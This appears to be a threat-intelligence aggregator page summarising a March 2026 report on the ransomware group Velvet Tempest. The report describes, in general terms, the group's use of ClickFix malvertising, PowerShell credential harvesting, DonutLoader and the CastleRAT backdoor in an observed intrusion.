Velvet Tempest leverages ClickFix and CastleRAT in ransomware operations
Summary
Hide ▲
Show ▼
The threat group Velvet Tempest, also tracked as DEV-0504, has been observed using the ClickFix technique and legitimate Windows utilities to deploy DonutLoader malware and CastleRAT backdoor in a simulated environment. The group, known for deploying multiple ransomware strains, conducted Active Directory reconnaissance, credential harvesting, and environment profiling over a 12-day period. Initial access was gained through a malvertising campaign leading to a ClickFix and CAPTCHA mix. Despite their history with ransomware, Termite ransomware was not deployed in this observed intrusion.
Timeline
-
07.03.2026 18:14 1 articles · 3h ago
Velvet Tempest observed using ClickFix and CastleRAT in simulated environment
Between February 3 and 16, Velvet Tempest conducted Active Directory reconnaissance, credential harvesting, and environment profiling in a replica environment for a U.S. non-profit organization. The group used PowerShell to harvest credentials and deployed DonutLoader and CastleRAT backdoor. Initial access was gained through a malvertising campaign leading to a ClickFix and CAPTCHA mix. Termite ransomware was not deployed in this observed intrusion.
Show sources
- Termite ransomware breaches linked to ClickFix CastleRAT attacks — www.bleepingcomputer.com — 07.03.2026 18:14
Information Snippets
-
Velvet Tempest, also known as DEV-0504, has been active in ransomware operations for at least five years.
First reported: 07.03.2026 18:141 source, 1 articleShow sources
- Termite ransomware breaches linked to ClickFix CastleRAT attacks — www.bleepingcomputer.com — 07.03.2026 18:14
-
The group has deployed ransomware strains such as Ryuk, REvil, Conti, BlackMatter, BlackCat/ALPHV, LockBit, and RansomHub.
First reported: 07.03.2026 18:141 source, 1 articleShow sources
- Termite ransomware breaches linked to ClickFix CastleRAT attacks — www.bleepingcomputer.com — 07.03.2026 18:14
-
The attack was observed between February 3 and 16 in a replica environment for a U.S. non-profit organization with over 3,000 endpoints and 2,500 users.
First reported: 07.03.2026 18:141 source, 1 articleShow sources
- Termite ransomware breaches linked to ClickFix CastleRAT attacks — www.bleepingcomputer.com — 07.03.2026 18:14
-
Initial access was gained through a malvertising campaign leading to a ClickFix and CAPTCHA mix.
First reported: 07.03.2026 18:141 source, 1 articleShow sources
- Termite ransomware breaches linked to ClickFix CastleRAT attacks — www.bleepingcomputer.com — 07.03.2026 18:14
-
The group used PowerShell to harvest credentials stored in Chrome and deployed DonutLoader and CastleRAT backdoor.
First reported: 07.03.2026 18:141 source, 1 articleShow sources
- Termite ransomware breaches linked to ClickFix CastleRAT attacks — www.bleepingcomputer.com — 07.03.2026 18:14
-
Termite ransomware was not deployed in the observed intrusion despite the group's history with ransomware.
First reported: 07.03.2026 18:141 source, 1 articleShow sources
- Termite ransomware breaches linked to ClickFix CastleRAT attacks — www.bleepingcomputer.com — 07.03.2026 18:14